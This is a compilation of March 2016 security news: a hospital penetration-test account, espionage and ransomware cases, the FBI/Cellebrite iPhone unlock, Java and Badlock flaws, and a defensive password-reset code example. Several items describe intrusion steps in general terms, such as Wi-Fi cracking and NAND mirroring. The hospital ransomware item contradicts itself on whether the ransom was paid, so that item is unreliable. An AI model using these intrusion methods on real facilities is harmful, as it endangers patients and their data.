There are a number of ways to find vulnerable devices, for example using the Shodan search engine. With the right Shodan queries you can find thousands of medical devices exposed to the Internet: an attacker could discover MRI scanners, cardiology equipment, radiological equipment and other related devices connected to the Internet. A lot of these devices still run the Windows XP OS and have dozens of old, unpatched vulnerabilities that could lead to the full compromise of a remote system. Moreover, in some cases these devices still have the default passwords, which can easily be found in manuals published on the Internet.
Shodan search results
When I was performing my research and penetration testing on a real hospital, I found a few devices connected to Internet, but they were protected quite well: no default passwords, no vulnerabilities in web control interfaces, etc. But even if the facility is protected from the Internet-side, it won’t stop a cybercriminal from looking for other methods to break in if his goal is to get access no matter what.
And here’s the second flaw – devices are not protected from being accessed from local networks.
In my case I just drove to the hospital location and discovered a number of Wi-Fi access points belonging to the hospital. One of them had a weak Wi-Fi password that I was able to crack within two hours. With this password I was able to get access to the internal hospital network; and I found the same medical equipment I previously discovered on the Internet, but with one major difference – now I was able to connect to them because the local network was a trusted network for them. Manufacturers of medical devices, when creating a whole system, protect them from external access. But for some reason they thought that if someone tries to access them internally – it’s trusted by default. This is radically wrong – do not rely on local system administrators and how they organize the internal network protection of a hospital.
This is where the third flaw comes in – vulnerabilities in software architecture.
When I connected to a device and passed through the default login screen, I immediately got access to the control interface and personal data and diagnosis information about hospital patients. But this is not what attracted my attention. There was a command shell implemented in the user interface giving me access to the file system on the device.
Patient MRI result
In my opinion, it’s a major vulnerability in the application design: even if there were no remote access at all, why would software engineers expose command shell access from the doctor’s interface? It definitely should not be there by default. This is what I was talking about at the beginning: you can provide good protection on one side and completely fail to pay attention to the others, and someone planning an attack will likely discover something like this and compromise the whole device.
The other concern about application vulnerabilities is of course outdated versions of operating systems and patch management difficulties. This is a completely different environment from the standard IT infrastructure for PCs or mobile devices; you cannot simply release a patch for a vulnerability and then upload it to medical devices. It’s a complex manual process and in many cases a qualified engineer is needed on the hospital site to perform a system upgrade and to test that the devices are working properly after the update. That takes time and money, so it’s essential to create a protected system from the very beginning – at the development stage – with as few application vulnerabilities as possible.
The vendors of medical equipment and hospital IT teams should pay close attention to the topic of medical cyber-security; they are now on the list of valuable targets in the cybercriminal underground. We will see a growing number of attacks on medical facilities in the year ahead, including targeted attacks, ransomware infections, DDoS, and even attacks to physically damage medical devices. And finally, the industry has started to pay attention – for example the U.S. Food and Drug Administration (FDA) issued guidance outlining important steps medical device manufacturers should take to continually address cyber-security risks to keep patients safe and to better protect the public health.
I would like to give some recommendations to the local IT personnel working in hospitals:
Be aware that cybercriminals are now targeting medical facilities, read about these incidents and try to figure out if the attack methods could affect your own infrastructure.
Stick as close to the implemented IT security policies as possible, and develop timely patch management and vulnerability assessment policies as well.
Focus not only on protecting your infrastructure from outside threats such as malware and hacker attacks but also on maintaining strict control over what’s going on inside your local network, who has access to what, and any other things that could lead to local systems being compromised.
Chinese hacker admitted hacking US Defense contractors
24.3.2016 Hacking
A Chinese national pleaded guilty yesterday, March 23, on charges with hacking trade secrets from US defense contractors.
The man, Su Bin (also known as Stephen Su and Stephen Subin), 50, had been charged in a 2014 indictment with hacking into the computer networks of US defense contractors, including Boeing. The hackers aimed to steal blueprints and intellectual property for the F-22 and F-35 fighter jets and the C-17 transport aircraft. In January 2015, documents leaked by Edward Snowden revealed that China had stolen designs for the US-built F-35 fighter jet by hacking computer systems at US defense contractors, and also provided details of a counter-intelligence operation run by the NSA.
According to the Snowden documents, US intelligence was aware that Chinese cyber spies had stolen “many terabytes of data” about the design of the Lockheed Martin F-35 Lightning II Joint Strike Fighter ordered by Australia. The details of the operation are described in a set of top-secret documents published by Der Spiegel.
Chinese hackers have allegedly stolen as much as 50 terabytes of data from US defense contractors, including details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs for cooling exhaust gases and the method the jet uses to track targets.
The purpose of the Chinese government is to acquire intellectual property on advanced technologies, benefiting Chinese companies on the market and narrowing the gap in research on advanced technology. Military experts speculated that the stolen blueprints could help the country develop a new generation of so-called “fifth-generation” fighters.
In 2014, according to a US criminal complaint, computers of Boeing and other military contractors had been hacked to steal intellectual property and trade secrets on transport aircraft. The initial attacks against Boeing likely occurred between January 14 and March 20, 2010. The complaint is dated June 27, 2014 and was unsealed in July 2014; it describes how the attackers spied on Boeing computer networks for a year and then compromised systems of other major US defense contractors to steal intellectual property. According to the information disclosed, the hackers were mainly interested in the C-17 military transport.
US law enforcement accused Su Bin, a Chinese businessman residing in Canada, of supporting two countrymen in organising cyber attacks on Boeing systems to collect information about the C-17 and other military programs.
The criminal complaint revealed that Su Bin and two unnamed co-conspirators, identified as UC1 and UC2, were collecting technical information related to components and performance of the C-17 transport and Lockheed Martin’s F-22 and F-35 fighter jets. During the period of the first attacks against Boeing, Su Bin was operating in the United States, as confirmed by FBI Special Agent Noel Neeman in the complaint.
Su Bin was arrested in June 2014 in Canada. Neeman revealed that an email attachment sent by UC1 claims the Chinese hackers exfiltrated 65 gigabytes of data over a couple of years, including information on the C-17 transport from Boeing systems. The FBI agent collected evidence of data theft from Boeing systems, but there is no proof that the stolen information was classified. The email also describes the huge effort the hackers spent to compromise Boeing’s systems, detailing the architecture of Boeing’s internal network, which includes 18 domains, 10,000 PCs and “huge quantities” of defense appliances.
“Through painstaking labor and slow groping, we finally discovered C-17 strategic transport aircraft-related materials stored in the secret network,” the document says.
He was sent to the United States in February 2016.
The hackers described the difficulties of breaching the system while evading the detection systems deployed by Boeing.
“From breaking into its internal network to obtaining intelligence, we repeatedly skipped around in its internal network to make it harder to detect reconnaissance, and we also skipped around at suitable times in countries outside the U.S. In the process of skipping, we were supported by a prodigious quantity of tools, routes and servers, which also ensured the smooth landing of intelligence data.” states the report.
The complaint did not provide any description of how the hackers stole information about the Lockheed Martin jet fighters.
Another document issued by the FBI described the communications between UC1 and UC2, which state that the Chinese hackers successfully acquired information about US military projects by establishing hot points in the U.S., France, Japan and Hong Kong. According to the complaint, this last document reveals that the subjects received about $1 million to build a team and infrastructure outside of China; the investigators are working to understand who funded the entire operation.
Now, in a plea agreement filed in a California federal court, Su admitted to conspiring with two unnamed persons in China from October 2008 to March 2014 to hack the networks of US contractors and steal “sensitive military information and to export that information illegally from the United States to China.”
The Court documents did not provide details on who operated the cyber espionage campaign, but security and intelligence experts believe that Su was working for the Chinese Government.
“Su Bin admitted to playing an important role in a conspiracy, originating in China, to illegally access sensitive military data, including data relating to military aircraft that are indispensable in keeping our military personnel safe,” said Assistant Attorney General John Carlin.
“This plea sends a strong message that stealing from the United States and our companies has a significant cost; we can and will find these criminals and bring them to justice.”
Sentencing was set for July 13, when the US government will issue its final ruling on the case. Su faces a maximum penalty of five years in prison and a monetary fine of $250,000 or twice the gross gain from the offense.
Patch Java immediately or attackers can hack you
24.3.2016 Vulnerebility
The CVE-2016-0636 flaw affects Java SE running in web browsers on desktops; attackers can trigger it remotely to take over your PC.
Once again a serious security vulnerability affects Oracle’s Java software. The new flaw, tracked as CVE-2016-0636, scored 9.3 on the Common Vulnerability Scoring System severity rating.
The CVE-2016-0636 vulnerability affects Java SE running in web browsers on desktops, which means that an attacker could set up a malicious web page to remotely take over a vulnerable PC. The vulnerability may be remotely exploitable without authentication.
“This vulnerability may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.” states the Oracle Security Alert for CVE-2016-0636.
“Oracle Java SE 7 Update 97, and 8 Update 73 and 74 for Windows, Solaris, Linux, and Mac OS X are affected.”
This vulnerability applies to Java deployments that load and run untrusted code coming from the internet. This vulnerability is not applicable to Java deployments that run only trusted code and does not affect Oracle server-based software.
Due to the high severity of this CVE-2016-0636 vulnerability and the public disclosure of technical details it is essential to upgrade the Java software as soon as possible.
“Due to the severity of this vulnerability and the public disclosure of technical details, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.” states Oracle.
Oracle released an updated version of Java, Java SE 8u77; releases installed by Windows users are updated automatically.
Resetting a password and sending it in readable form by e-mail? A dangerous practice
24.3.2016 Source: Lupa.cz Protection
If you use a paid service where a person with access to the service can influence how much you pay, you want the service to be secure. That much is clear.
If you use the media monitoring services of Newton Media, you have probably encountered a strange habit. Roughly once a month you receive a new password by e-mail, with the justification that this is a security measure so that nobody can misuse the password. The password is therefore changed automatically and sent to the customer.
It is a very strange and dangerous practice with two fundamental problems. The smaller one: the needless changing of the password, and with it the constant need to record the new password somewhere, without being allowed to use a secure password of one's own choosing. Forced password changes usually lead to people using insecure passwords (because they cannot memorize one new complex password after another) or simply sticking the passwords on notes on their monitor.
The bigger and more fundamental problem, however, is sending the new password in readable form by e-mail. E-mail is not a secure form of communication: someone can read it not only in transit, but can also get into someone else's mailbox, phone, computer or tablet.
We asked Newton Media to explain this very unusual approach, including how they store customers' passwords. The query sent on 7 March was answered only on 21 March, after several reminders. The complete answer:
ad 1) In the new applications the password is no longer stored in NEWTON Media systems at all. An initial randomly generated password is sent to the client, who must change it at first login, and NEWTON Media stores only a hash (fingerprint) of this password, used to verify the password entered by the user at subsequent logins. The new applications of course communicate only over the encrypted HTTPS protocol.
ad 2) In the older NEWTON Media applications (e.g. MediaSearch) either the complete text of the password or only a hash is stored, optionally. The choice depends on the client's wishes. In the oldest application, IMM, the complete text of the password is stored. When the complete text of the password is stored, the password is encrypted/decrypted by the application, so it is stored in the database in unreadable form and therefore not even the database administrator can read the password.
It follows that if you use any of Newton Media's products (applications), your password may be stored in fully readable form and available to anyone, including a potential attacker who gains access to the databases.
After follow-up questions we also know that the hash used is the SHA algorithm from the .NET framework, supplemented with a salt, also produced by the random generator from .NET. The password resetting mentioned above concerns only the old applications, and this functionality was reportedly "introduced at numerous customer requests".
Which raises a fundamental question: is it really a good idea to follow customers' dangerous ideas? In the new applications, however, this potentially dangerous functionality no longer exists.
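As an added example, not code from Lupa.cz or Newton Media, this is what the safer design sketched in the company's reply looks like in practice: the store keeps only a per-user random salt and a digest (PBKDF2-HMAC-SHA256 and its work factor are my assumptions, standing in for the salted .NET SHA hash mentioned above), and a forgotten password is handled with a short-lived, single-use reset token whose hash alone is stored, so neither the e-mail nor the database yields a lasting readable credential. The in-memory store, user names and time values are constructed for the illustration.

```python
# Added example (not Lupa.cz's or Newton Media's code): a password store that keeps only a
# salted hash, plus a reset flow that e-mails a short-lived one-time token instead of a new
# password. Hash parameters and the in-memory "database" are assumptions.
import hashlib
import hmac
import os
import secrets
import time
from typing import Optional, Tuple

PBKDF2_ITERATIONS = 200_000   # assumed work factor for PBKDF2-HMAC-SHA256 (stdlib)
TOKEN_TTL_SECONDS = 900       # reset tokens live 15 minutes (assumption)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh 16-byte random salt is drawn when none is supplied."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


class AccountStore:
    """Minimal in-memory account store: only salts, digests and token hashes are kept."""

    def __init__(self):
        self._users = {}    # username -> {"salt": bytes, "digest": bytes}
        self._resets = {}   # username -> {"token_hash": bytes, "expires": float}

    def create_user(self, username: str, password: str) -> None:
        salt, digest = hash_password(password)
        self._users[username] = {"salt": salt, "digest": digest}

    def verify_login(self, username: str, password: str) -> bool:
        rec = self._users.get(username)
        if rec is None:
            hash_password(password)   # do the same work so unknown users are not faster
            return False
        _, digest = hash_password(password, rec["salt"])
        return hmac.compare_digest(digest, rec["digest"])

    def start_reset(self, username: str, now: Optional[float] = None) -> str:
        """Return the one-time token to e-mail; only its SHA-256 is stored server-side."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._resets[username] = {
            "token_hash": hashlib.sha256(token.encode()).digest(),
            "expires": now + TOKEN_TTL_SECONDS,
        }
        return token

    def finish_reset(self, username: str, token: str, new_password: str,
                     now: Optional[float] = None) -> bool:
        """Consume the token (a wrong guess also burns it) and let the user pick a password."""
        now = time.time() if now is None else now
        pending = self._resets.pop(username, None)
        if pending is None or now > pending["expires"]:
            return False
        presented = hashlib.sha256(token.encode()).digest()
        if not hmac.compare_digest(presented, pending["token_hash"]):
            return False
        self.create_user(username, new_password)
        return True

    def stored_record(self, username: str) -> dict:
        """What someone with database access sees for a user: salt and digest only."""
        return self._users[username]
```

Nothing e-mailed here is a password: the token expires, works once, and a database copy of it is only a hash. The user chooses the replacement password, so the forced monthly rotation the article criticizes is not needed.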
This is how the FBI could extract data from an encrypted iPhone
24.3.2016 Source: Zive.cz Mobile
In the FBI vs. Apple case the verdict has been postponed, since the FBI has reportedly found a way to unlock the encrypted iPhone of the attacker Syed Farook. The only known information is that a third party is supposed to help with unlocking the phone. We have no further details, which leaves room for further speculation.
Recode carries a statement by Jonathan Zdziarski (better known in the hacker community as NerveGas). The hacker suggests that one possible way to break the phone's security is the "brute force" method: simply trying as many possible combinations as possible to find the correct code.
The FBI could reportedly use the NAND mirroring method when hacking the iPhone 5C
There is one catch, however: the phone is protected against repeated entry of an incorrect code, and after a certain number of attempts all data is erased. The way to get around this, according to Zdziarski, is NAND mirroring, i.e. copying the contents of the flash memory to external media. That requires removing the memory chip from the phone and connecting it to a reader.
The chip would then be put back, and if the numeric combination to unlock the phone was not hit, the memory would be restored from the original backup and the attempt could be repeated. The only obstacle here is safely removing the chip from the phone; an attempt at removal could damage it.
Israeli Cellebrite firm is helping FBI in cracking San Bernardino shooter’s iPhone
24.3.2016 Apple
The Israeli firm Cellebrite is helping the Federal Bureau of Investigation (FBI) unlock the San Bernardino shooter’s iPhone.
In the last weeks we have followed the case of the San Bernardino shooter’s iPhone, which a few days ago reached an unexpected conclusion: on Monday the FBI announced it had found a way to unlock the mobile device without Apple’s help.
The court filing doesn’t provide technical details on the technique, but confirmed that an independent party demonstrated to the US authorities a technique for unlocking the controversial iPhone.
“On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook’s iPhone,” revealed the lawyers for the US Government in a court filing Monday afternoon. “Testing is required to determine whether it is a viable method that will not compromise data on Farook’s iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case.”
Now the name of the company is circulating on the Internet: it is the Israeli mobile forensics firm Cellebrite, one of the world’s leading companies in the field of digital forensics. The company already works with the principal law enforcement and intelligence agencies worldwide.
Cellebrite provides the FBI with decryption technology as part of a contract signed in 2013; its technology allows investigators to extract information from mobile devices.
“Cellebrite’s technology is able to extract valuable information from cellular devices that could be used in criminal and intelligence investigations, even if the phone and the information it contains are locked and secure.” states a blog post published on the Israeli YNetNews.
The website of the Cellebrite company confirms that its technology allows investigators to unlock Apple devices running iOS 8.x.
“Cellebrite’s Advanced Investigative Services (CAIS) offers global law enforcement agencies a breakthrough service to unlock Apple devices running iOS 8.x. This unique capability is the first of its kind – unlock of Apple devices running iOS 8.x in a forensically sound manner and without any hardware intervention or risk of device wipe.” reports the company website. “Cellebrite’s unlocking capability supports the following devices: iPhone 4S / 5 / 5C, iPad 2 / 3G / 4G, iPad mini 1G, and iPod touch 5G running iOS 8 – 8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2 / 8.1.3 / 8.2 / 8.3 / 8.4 / 8.4.1.”
One of its main solutions designed by the company is the Universal Forensic Extraction Device (UFED) that could be used to extract all data and passwords from mobile phones.
If Cellebrite is able to crack the San Bernardino shooter’s iPhone, the FBI will no longer need Apple’s help.
According to public documents, the FBI committed to a $15,278 “action obligation” with Cellebrite.
At the time of writing there were no details of the contract between the FBI and the Cellebrite firm.
Israeli Forensic Firm 'Cellebrite' is Helping FBI to Unlock Terrorist's iPhone
23.3.2016 Apple
Meet the security company that is helping the Federal Bureau of Investigation (FBI) unlock the San Bernardino shooter’s iPhone:
The Israeli mobile forensics firm Cellebrite.
Yes, Cellebrite – the provider of mobile forensic software from Israel – is helping the FBI in its attempt to unlock iPhone 5C that belonged to San Bernardino shooter, Syed Rizwan Farook, the Israeli YNetNews reported on Wednesday.
The company's website claims that its service allows investigators to unlock Apple devices running iOS 8.x "in a forensically sound manner and without any hardware intervention or risk of device wipe."
If Cellebrite succeeds in unlocking Farook’s iPhone, the FBI will no longer need Apple to create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple is engaged in a legal encryption battle with the US Department of Justice (DoJ) over a court order that forces the company to write new software, which could disable passcode protection on Farook's iPhone 5C.
Apple, for its part, is firm, saying that the FBI wants the company to create effectively the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI Committed $15,278 "action obligation" with Cellebrite
The revelation comes just two days after the DoJ suspended the proceedings at least until next month. The FBI told a federal judge on Monday that it needed some time to test a possible method for unlocking the shooter's iPhone, for which it has hired an "outside party".
According to public records, the same day the Feds committed to a $15,278 "action obligation" – the lowest amount the government has agreed to pay – with Cellebrite.
Many details of the contract are not yet available, and neither the FBI nor Cellebrite has officially commented on their contract publicly.
Watch Video: Here’s What Cellebrite Can Do
Founded in 1999, Cellebrite provides digital forensics tools and software for mobile phones. One of its main products is the Universal Forensic Extraction Device (UFED) that claims to help investigators extract all data and passwords from mobile phones.
For the company's hand on iOS devices, you can watch the 2015 YouTube video (above), demonstrating one of Cellebrite's products that unlocked the device in several hours.
Now the question is: if the FBI has found an iPhone backdoor that has the potential to affect hundreds of millions of Apple users, will it report the flaw to Apple or keep it to itself?
Warning! Think Twice Before Using USB Drives
23.3.2016 Safety
Security researchers have discovered a new data-stealing Trojan that makes special use of USB devices in order to spread itself and does not leave any trace of activity on the compromised systems.
Dubbed USB Thief (or Win32/PSW.Stealer.NAI), the malware is capable of stealthily attacking air-gapped or isolated computers, warns the security firm ESET.
The malware author has employed special programs to protect the USB Thief from being reproduced or copied, making it even harder to detect and reverse-engineer.
USB Thief has been designed for targeted attacks on computer systems that are isolated from the Internet, according to the ESET malware analyst Tomáš Gardoň.
The 'USB Thief' Trojan Malware
The USB Thief Trojan malware is stored either as a portable application's plugin source or as a Dynamically Linked Library (DLL) used by the portable application.
Since USB devices often store popular applications like Firefox, Notepad++ or TrueCrypt portable, once any of these applications is executed, the malware starts running in the background.
USB Thief is capable of stealing data from air-gapped systems – systems that are isolated from the Internet and other external networks.
"Well, taking into account that organizations isolate some of their systems for a good reason," explained Peter Stancik, the security evangelist at ESET. "Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous."
The malware runs from a USB removable device, so it doesn’t leave any traces of its activities, and thus victims do not even notice that their data has been stolen.
Since the malware is bound to a single USB device, it prevents USB Thief from leaking from the infected computers.
Besides this, USB Thief utilizes a sophisticated implementation of multi-staged encryption that makes the malware harder to detect and analyse.
"This is not a very common way to trick users, but very dangerous," Stancik said. "People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy."
Here's How you can Protect from being Infected:
Do not use USB storage devices from non-trustworthy sources.
Turn off Autorun
Regularly backup your data
More technical details are available on ESET Ireland’s official blog.
Badlock — Unpatched Windows-Samba Vulnerability Affects All Versions of Windows
23.3.2016 Vulnerebility
Security researchers have discovered a nasty security vulnerability that is said to affect almost every version of Windows and Samba and will be patched on April 12, 2016, the Samba development team announced Tuesday.
So, Save the Date if you are a Windows or Samba file server administrator.
Samba is a free, open source implementation of the SMB/CIFS network file sharing protocol that runs on the majority of operating systems available today, including Windows, UNIX, Linux, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to communicate with the same networking protocol as the Windows products, thus enabling users to access network shared folders and files from Windows OS.
Dubbed Badlock, the vulnerability was discovered by Stefan Metzmacher, a developer on the Samba Core Team.
Details about the Badlock vulnerability will be disclosed on April 12, when the developers of Microsoft and Samba release security patches to fix the flaw.
With a proper name, website and even logo, Badlock seems to be another marketed vulnerability that will likely be exploited by hackers once its details become public.
Here's what Badlock.org website reads:
On April 12th, 2016 a crucial security bug in Windows and Samba will be disclosed. We call it: Badlock. Engineers at Microsoft and the Samba Team are working together to get this problem fixed. Patches will be released on April 12th.
Admins and all of you responsible for Windows or Samba server infrastructure: Mark the date. (Again: It's April 12th, 2016.) Please get yourself ready to patch all systems on this day. We are pretty sure that there will be exploits soon after we publish all relevant information.
Although this sort of pre-notification is appreciated, especially by system administrators who can prepare to apply the patch as soon as possible, the advance notice could also benefit the bad guys.
Security experts also believe that the available information might be enough for malicious hackers to independently find Badlock and exploit the vulnerability before a patch is released.
Three Syrian Electronic Army Hackers are in the FBI Most Wanted
23.3.2016 Crime
Three members of the Syrian Electronic Army hacker crew have been inserted by the US authorities in the list of most wanted criminals.
The Syrian Electronic Army, aka SEA, is considered one of the most dreaded hacking crews; it first appeared in 2011. According to the report “Syrian Electronic Army – Hacktivision to Cyber Espionage?,” published in 2014, in the beginning the Syrian Electronic Army was mainly politically motivated: members of the collective hacked to spread political messages in support of Syrian President Bashar Al-Assad.
But over time, the group has increased its popularity, targeting principal enterprises like Microsoft and Twitter, and media agencies like The New York Times, Reuters, the Associated Press, E! Online, Time, CNN, The Washington Post, The Daily Dot, Vice, Human Rights Watch, Harvard University, NASA and The Onion.
The list of victims of the Syrian Electronic Army also includes the US CENTCOM and the White House.
As the report reveals, the “SEA has evolved into the realm of global espionage, where some of their targets are “C” level executives at technology and media companies, allied military procurement officers, United States defense contractors, and foreign attaches and embassies.”
Now the FBI has added three members of the Syrian Electronic Army to its Most Wanted list. They are:
Ahmad Umar Agha (aka The Pro), 22
Firas Dardar (aka The Shadow), 27
Peter Romar, 36
The three alleged members of the hacker collective are believed to reside in Syria, where it is impossible to arrest them.
The US Department of Justice and the Federal Bureau of Investigation (FBI) are offering a $100,000 reward for any information that leads to the capture of the alleged leaders of the Syrian Electronic Army.
Agha and Dardar have been added to the FBI’s Most Wanted list.
The authorities believe that Ahmad Umar Agha and Firas Dardar were involved in the hacking of the Twitter Account of the Associated Press in April 2013, the hackers spread fake news of a cyber attack against the White House that had a serious effect on the stock market.
The hackers were involved in numerous hacking and propaganda campaigns from 2011 to 2013.
“According to allegations in the first complaint, beginning in or around 2011, Agha and Dardar engaged in a multi-year criminal conspiracy under the name “Syrian Electronic Army” in support of the Syrian Government and President Bashar al-Assad.” reads the US Department of Justice (DoJ) statement.
“The conspiracy was dedicated to spear-phishing and compromising the computer systems of the US government, as well as international organizations, media organizations and other private-sector entities that the SEA deemed as having been antagonistic toward the Syrian Government.”
The FBI tracked the hackers online, in particular, the authorities obtained court orders to search their online accounts on Gmail and Facebook platforms. The hackers, in fact, used the popular services to communicate and exchange the stolen data.
Agha and Dardar are each charged with multiple conspiracies related to computer hacking, including:
Engaging in a hoax regarding a terrorist attack
Attempting to cause mutiny of the US armed forces
Access device fraud
Illicit possession of authentication features
Unlawful access to stored communications
Unauthorized access to, and damage of, computers
Dardar and Peter Romar are separately charged with conspiracies related to:
Unauthorized access to, and damage of, computers
Receiving the proceeds of extortion
Money laundering
Wire fraud
Violations of the Syrian Sanctions Regulations
Nation-state hacking or cybercrime?
This is the position of the U.S. Assistant Director Trainor.
“Cybercriminals cause significant damage and disruption around the world, often under the veil of anonymity,” said Assistant Director Trainor. “As this case shows, we will continue to work closely with our partners to identify these individuals and bring them to justice, regardless of where they are.”
“These three members of the Syrian Electronic Army targeted and compromised computer systems in order to provide support to the Assad regime as well as for their own personal monetary gain through extortion,” said Assistant Director in Charge Abbate. “As a result of a thorough cyber investigation, FBI agents and analysts identified the perpetrators and now continue to work with our domestic and international partners to ensure these individuals face justice in the United States. I want to thank the dedicated FBI personnel, federal prosecutors, and our law enforcement partners for their tremendous efforts to ensure on-line criminal activity is countered, U.S. cyber infrastructure is safeguarded, and violators are held accountable under the law.”
“The tireless efforts of U.S. prosecutors and our investigative partners have allowed us to identify individuals who have been responsible for inflicting damage on U.S. government and private entities through computer intrusions,” said U.S. Attorney Boente. “Today’s announcement demonstrates that we will continue to pursue these individuals no matter where they are in the world.”
All of the three alleged members are thought to be resident in Syria. The United States government is inviting tip-offs.
The FBI is investigating ransomware-based attack at Methodist Hospital
23.3.2016 Virus
The FBI is investigating the cyber attack on Methodist Hospital in Henderson; once again ransomware has hit a critical infrastructure.
Ransomware is one of the most dangerous cyber threats for businesses and government organizations, and the number of infections worldwide is constantly increasing. Recently I reported the discovery in the wild of a new variant of TeslaCrypt, while security firms are warning of a spike in the number of attacks based on the Locky malware.
What happens when ransomware hits a critical infrastructure?
The impact could be serious. In recent months ransomware hit the Israeli Public Utility Authority with a severe impact on its operations, while several attacks hit the computer systems of hospitals in the US and Germany.
In February, two German hospitals were infected by ransomware, as happened recently at the US Hollywood Presbyterian Medical Center. The Los Angeles hospital paid about $17,000 to the crooks to restore patients’ files.
News of the day: the systems at another US hospital have been infected by ransomware, the Methodist Hospital in Kentucky.
According to NewsChannel10, the Methodist Hospital in Henderson was hit by ransomware that locked patients’ files and is demanding money to regain access to them. Officials say that the hospital paid about $17,000 to the hackers to get access back to the patients’ files.
“In the past, we haven’t seen crimes in such a large scale like Methodist,” said KSP trooper Shane Settle. “In general, the more a criminal commits a crime, the more confident they get, especially if they get away with it. I think that’s what you’re seeing here is they are shooting for a much larger target and more money.”
“We’ve notified the FBI, we’re dealing with federal authorities on how to deal with it,” said David Park, Methodist Hospital COO. “Depending upon the number of records that were locked, depends upon whether we’re going to consider looking into whether we pay anything or not.”
The ransomware copies the patients’ files, encrypts them and then deletes the originals. The good news is that the IT staff at the Methodist Hospital in Henderson has up-to-date backups, which drastically limits the effects of the ransomware on the infrastructure.
In a press release, Methodist Hospital officials reassured patients that their information is secure; the hospital is currently working with a backup infrastructure while the internal staff sanitizes the systems.
We must expect similar attacks in the near future: medical data are a precious commodity in the underground.
According to The Ponemon Institute’s 2015 Global Cost of Data Breach Study, the health care industry suffered the highest costs, estimated at an average of $363 per record, a figure that does not surprise experts given the higher value of medical records compared to credit card data.
A set of complete health insurance credentials sold for $20 on the underground markets in 2013 — 10 to 20 times the price of a U.S. credit card number with a security code, according to Dell.
Caleb Barlow, vice president at IBM Security, explained that data in a medical record have a much longer shelf life than that of a credit card number.
“With credit cards, the time frame from the breach to mitigation is very short,” Barlow explained. “But the health care record can be used to establish access in perpetuity. It can be used to establish credit or steal your identity ten or fifteen years from now,” he added. “Once this information is out there, you can’t get the genie back in the bottle.”
UPDATED – Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
23.3.2016 Crime
Brussels explosions: dozens dead after blasts at Zaventem airport and Maalbeek metro in a terror attack. Panic and chaos in the city. IS claims responsibility for the attack.
This morning Europe has again fallen into terror: just months after the Paris attacks, a new wave of attacks has hit the West. This morning a sequence of explosions was detonated at Brussels Airport in an alleged suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.
The first two Brussels explosions hit the departure hall at the international Zaventem airport shortly before 8am, next to the American Airlines check-in desk. Other explosions were detonated at the Schuman and Maalbeek metro stations, not far from the EU headquarters. The explosions at the Maalbeek metro station occurred one hour later.
Brussels explosions map (source: FT.com)
A government source confirmed to the VRT broadcaster that it was a terror attack. The number of victims is increasing minute by minute; the latest reports count at least 34 dead and hundreds of people injured.
“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.
Brussels explosions photo (source: FT.com)
Local authorities are urging people not to approach the area under attack.
Brussels Airport’s Twitter account told followers: “There have been 2 explosions at the airport.”
Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.
The Brussels explosions come only a day after Belgium’s interior minister, Jan Jambon, warned of possible terror attacks after the recent arrest of Salah Abdeslam, one of the participants in the Paris terror attacks.
My thoughts are with the people of Brussels following these ignoble attacks.
From a cyber security perspective, I invite all to remain vigilant, crooks will try to exploit the media attention on the Brussels explosions sharing bogus videos and malicious link. It is likely we will detect a phishing campaign trying to exploit the event.
Pierluigi Paganini
(Security Affairs – Brussels explosions, terror attack)
Update 2016-03-22, 14:00 GMT
One top #ISIS distribution account celebrated #Brusselsattack: “The blood feud is lengthy, o dogs of Europe… Did you think for a day that we would forget to avenge your occupation of the Muslims’ lands?”
Update 2016-03-23, 11:30 GMT
According to the newspaper La Derniere Heure, the man arrested is not Najim Laachraoui.
Update 2016-03-23, 10:00 GMT
Attack in Brussels: the authorities have arrested the third man, the alleged artificer.
Update 2016-03-23, 9:00 GMT
The authorities have identified two suicide bombers, the brothers Khaled and Ibrahim El Bakraoui. The third man, the one wearing a hat on the right, is believed to be the group’s artificer and, according to intelligence, the same artificer behind the Paris attacks.
Tor improves security and can detect spying code
23.3.2016 Security
The organization has been improving its ability to detect tampered software for three years.
The Tor Project has refined its software to a level where it can quickly detect whether a particular network has been tampered with for surveillance purposes, one of the project's lead developers wrote on Monday.
There are concerns that Tor could be either subverted or constrained by court orders, which could force the project to hand sensitive information over to government entities; a case similar to the current dispute between Apple and the US court.
Tor's developers are therefore now building the system in such a way that several people can check that the code has not been altered, which "eliminates single points of failure," Mike Perry, lead developer of the Tor Browser, also wrote on Monday.
Over the past few years Tor has focused on giving users access to its source code, which they can then modify to produce their own builds of Tor that can subsequently be verified against the organization's public cryptographic keys and against other copies of the application.
"Even if a government or criminals obtained our cryptographic keys, our network and its users would be able to quickly detect this fact and report it as a security threat," Perry continues. "From a technical point of view, our review and source code development process means that the probability of detecting such malicious code would be high, and the remedy quick."
At least two cryptographic keys would be needed for a modified version of the Tor Browser to get past the security measures, at least initially: the SSL/TLS key that secures the connection between the user and Tor, and the key used to sign software updates.
"Right now two keys are needed, and those keys are not even held by the same people," Perry writes in a Q&A at the end of his post. "They are also both secured in different ways."
Even if an attacker obtained the keys, users would in theory be able to examine the software's hash and thus find out whether it had been maliciously modified.
